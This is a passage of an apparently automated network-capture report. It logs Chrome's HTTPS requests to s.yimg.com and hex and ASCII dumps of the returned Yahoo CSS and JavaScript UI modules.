                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 7d 23 61 74 6f 6d 69 63 20 2e 42 78 7a 5c 28 62 62 5c 29 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 23 61 74 6f 6d 69 63 20 2e 42 78 73 68 5c 28 6e 5c 29 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 2d 2d 62 61 74 63 61 76 65 5c 29 7b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 61 74 63 61 76 65 29 7d 23 61 74 6f 6d 69 63 20 2e 43 5c 28 2d 2d 62 6c 61 63 6b 5c 29 2c 23 61 74 6f 6d 69 63 20 2e 43 5c 28 2d 2d 62 6c 61 63 6b 5c 29 5c 3a 5c 3a 70 68 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 62 6c 61 63 6b 29 7d 23 61 74 6f 6d 69 63 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: d-repeat:no-repeat}#atomic .Bxz\(bb\){box-sizing:border-box}#atomic .Bxsh\(n\){box-shadow:none}#atomic .C\(--batcave\){color:#232a31;color:var(--batcave)}#atomic .C\(--black\),#atomic .C\(--black\)\:\:ph::placeholder{color:#000;color:var(--black)}#atomic
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 23 61 74 6f 6d 69 63 20 2e 46 77 5c 28 32 30 30 5c 29 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 32 30 30 7d 23 61 74 6f 6d 69 63 20 2e 46 77 5c 28 35 30 30 5c 29 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 23 61 74 6f 6d 69 63 20 2e 46 77 5c 28 36 30 30 5c 29 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 32 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 33 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 34 70 78 5c 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 23 61 74 6f 6d 69 63 20 2e 46 7a 5c 28 31 65 6d 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: stify-content:space-between}#atomic .Fw\(200\){font-weight:200}#atomic .Fw\(500\){font-weight:500}#atomic .Fw\(600\){font-weight:600}#atomic .Fz\(12px\){font-size:12px}#atomic .Fz\(13px\){font-size:13px}#atomic .Fz\(14px\){font-size:14px}#atomic .Fz\(1em\
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 5c 29 7b 70 61 64 64 69 6e 67 3a 30 7d 23 61 74 6f 6d 69 63 20 2e 50 5c 28 32 30 70 78 5c 29 7b 70 61 64 64 69 6e 67 3a 32 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 5c 28 38 70 78 5c 29 7b 70 61 64 64 69 6e 67 3a 38 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 78 5c 28 30 5c 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 23 61 74 6f 6d 69 63 20 2e 50 78 5c 28 30 5c 2e 34 65 6d 5c 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 34 65 6d 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 2e 34 65 6d 7d 23 61 74 6f 6d 69 63 20 2e 50 78 5c 28 31 30 70 78 5c 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 30 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 30 70 78 7d 23 61 74 6f 6d 69 63 20 2e 50 78 5c 28 32 30 70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: \){padding:0}#atomic .P\(20px\){padding:20px}#atomic .P\(8px\){padding:8px}#atomic .Px\(0\){padding-left:0;padding-right:0}#atomic .Px\(0\.4em\){padding-left:.4em;padding-right:.4em}#atomic .Px\(10px\){padding-left:10px;padding-right:10px}#atomic .Px\(20p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC370INData Raw: 31 7d 23 61 74 6f 6d 69 63 20 2e 5a 5c 28 31 30 5c 29 7b 7a 2d 69 6e 64 65 78 3a 31 30 7d 2e 48 69 64 64 65 6e 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6c 69 70 3a 72 65 63 74 28 31 70 78 2c 31 70 78 2c 31 70 78 2c 31 70 78 29 3b 62 6f 72 64 65 72 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 31 70 78 21 69 6d 70 6f 72 74 61 6e 74 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 70 78 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 53 74 72 65 74 63 68 65 64 42 6f 78 7b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 1}#atomic .Z\(10\){z-index:10}.Hidden{position:absolute!important;clip:rect(1px,1px,1px,1px);border:0!important;height:1px!important;overflow:hidden;padding:0!important;width:1px!important}.StretchedBox{bottom:0;left:0;right:0;top:0}@media screen and (max


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              120192.168.2.45114187.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC365OUTGET /aaq/wf/wf-benji-1.2.0-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC763INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: qzjoeAv4KYDR0TqSFqHywrfZAzYud4MvoTvD2SNDoPuqPoiW9wXGv7IZWiqkyA5LT7aYNaSxWgKpYJV8nDefekuBVsyBF6q8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 24018KBK0JEMGE40
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Mon, 07 Oct 2024 13:55:22 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Mon, 20 May 2024 21:26:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "11cf4f9bff98fc79f8eecf2894832023"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: tIzwVm575mAKu9xUI7zQ09wGt6PpRi8K
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 8353
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 105502
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 62 65 6e 6a 69 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 62 65 6e 6a 69 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c 7b 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-benji",[],t):"object"==typeof exports?exports["wafer-benji"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: totype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 61 74 74 65 6d 70 74 20 74 6f 20 64 65 73 74 72 75 63 74 75 72 65 20 6e 6f 6e 2d 69 74 65 72 61 62 6c 65 20 69 6e 73 74 61 6e 63 65 22 29 7d 7d 28 29 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2e 6b 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: );throw new TypeError("Invalid attempt to destructure non-iterable instance")}}(),l=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(e,r.ke
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 74 68 69 73 2e 5f 75 74 69 6c 3b 72 65 74 75 72 6e 7b 6f 66 66 73 65 74 58 3a 65 2e 6f 66 66 73 65 74 58 2c 6f 66 66 73 65 74 59 3a 65 2e 6f 66 66 73 65 74 59 2c 74 72 69 67 67 65 72 3a 65 2e 74 72 69 67 67 65 72 7d 7d 7d 5d 29 2c 74 7d 28 76 29 3b 77 2e 65 76 65 6e 74 73 3d 7b 7d 3b 76 61 72 20 6a 3d 77 2c 6d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 72 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 72 26 26 28 72 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: this._util;return{offsetX:e.offsetX,offsetY:e.offsetY,trigger:e.trigger}}}]),t}(v);w.events={};var j=w,m=function(){function e(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 69 65 77 70 6f 72 74 22 3d 3d 3d 6f 26 26 28 69 3d 6b 28 65 2c 7b 6f 66 66 73 65 74 58 3a 2d 31 2a 6e 2c 6f 66 66 73 65 74 59 3a 2d 31 2a 72 7d 2c 43 2e 76 69 65 77 70 6f 72 74 29 29 2c 69 26 26 76 2e 74 72 69 67 67 65 72 46 6f 72 45 6c 65 6d 65 6e 74 73 28 5b 65 5d 2c 7b 73 6f 75 72 63 65 3a 22 73 74 61 74 65 22 7d 29 7d 2c 62 2e 73 79 6e 63 28 29 2c 62 7d 72 65 74 75 72 6e 20 66 28 74 2c 65 29 2c 6d 28 74 2c 5b 7b 6b 65 79 3a 22 5f 63 68 65 63 6b 49 66 42 65 6e 6a 69 4e 61 6d 65 53 70 61 63 65 45 78 69 73 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: iewport"===o&&(i=k(e,{offsetX:-1*n,offsetY:-1*r},C.viewport)),i&&v.triggerForElements([e],{source:"state"})},b.sync(),b}return f(t,e),m(t,[{key:"_checkIfBenjiNameSpaceExist",value:function(){var e=this,t=arguments.length>0&&void 0!==arguments[0]?arguments
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 72 43 6c 61 73 73 29 2c 43 2e 65 6d 69 74 57 61 66 65 72 45 76 65 6e 74 28 22 62 65 6e 6a 69 3a 65 72 72 6f 72 22 2c 7b 65 6c 65 6d 3a 6e 2c 6d 65 74 61 3a 7b 64 61 74 61 3a 65 2c 69 64 3a 74 7d 7d 29 7d 7d 7d 2c 7b 6b 65 79 3a 22 6c 69 73 74 65 6e 54 6f 42 65 6e 6a 69 45 76 65 6e 74 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 73 74 61 74 65 3b 69 66 28 21 65 2e 61 64 64 65 64 4c 69 73 74 65 6e 65 72 46 6f 72 62 65 6e 6a 69 45 76 65 6e 74 73 29 7b 65 2e 61 64 64 65 64 4c 69 73 74 65 6e 65 72 46 6f 72 62 65 6e 6a 69 45 76 65 6e 74 73 3d 21 30 3b 76 61 72 20 74 3d 77 69 6e 64 6f 77 2e 62 65 6e 6a 69 3b 74 2e 6f 6e 28 22 52 45 4e 44 45 52 5f 53 55 43 43 45 45 44 45 44 22 2c 74 68 69 73 2e 68 61 6e 64 6c 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: rClass),C.emitWaferEvent("benji:error",{elem:n,meta:{data:e,id:t}})}}},{key:"listenToBenjiEvents",value:function(){var e=this._state;if(!e.addedListenerForbenjiEvents){e.addedListenerForbenjiEvents=!0;var t=window.benji;t.on("RENDER_SUCCEEDED",this.handle
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC553INData Raw: 65 79 3a 22 68 61 6e 64 6c 65 52 65 73 69 7a 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 76 61 6c 69 64 61 74 65 57 69 74 68 44 65 62 6f 75 6e 63 65 28 29 7d 7d 2c 7b 6b 65 79 3a 22 77 69 6c 6c 56 61 6c 69 64 61 74 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 5b 5d 2c 6e 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 3b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 3d 6e 2e 67 65 74 28 65 29 2c 6f 3d 72 2e 69 6e 73 74 61 6e 63 65 2c 69 3d 6f 2e 63 6f 6e 66 69 67 2c 61 3d 69 2e 6f 66 66 73 65 74 58 2c 73 3d 69 2e 6f 66 66 73 65 74 59 2c 66 3d 69 2e 74 72 69 67 67 65 72 3b 22 76 69 65 77 70 6f 72 74 22 3d 3d 3d 66
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ey:"handleResize",value:function(){this._validateWithDebounce()}},{key:"willValidate",value:function(e){var t=[],n=this._state.elementInstances;e.forEach(function(e){var r=n.get(e),o=r.instance,i=o.config,a=i.offsetX,s=i.offsetY,f=i.trigger;"viewport"===f


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              121192.168.2.45114387.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC371OUTGET /aaq/wf/wf-scrollview-2.23.3-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: 2Xr3BF4gF3fLfFNMTL8eKXmtz31RKsmJsnxs7GK4j9785qgJx69eIqIYKzYZBBVnQUrFyUFVUx9BKRBn+83y7PT0WhMiePKEtx9LXrS5z3g=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: M8BFYAZAWBHEXYB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Thu, 03 Oct 2024 04:43:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Thu, 13 Jun 2024 07:21:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "4636cb14c3d8d1eba5bb4da2cfcf18aa"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: wbLD4opJICdradPjNHbYrnSOdnE8aBLq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 35505
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 484225
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 73 63 72 6f 6c 6c 76 69 65 77 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 73 63 72 6f 6c 6c 76 69 65 77 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-scrollview",[],t):"object"==typeof exports?exports["wafer-scrollview"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:43 UTC1300INData Raw: 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 21 74 7c 7c 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 3f 65 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 2c 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: super() hasn't been called");return!t||"object"!=typeof t&&"function"!=typeof t?e:t}function l(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Super expression must either be null or a function, not "+typeof t);e.prototype=Object.create(t&&t.
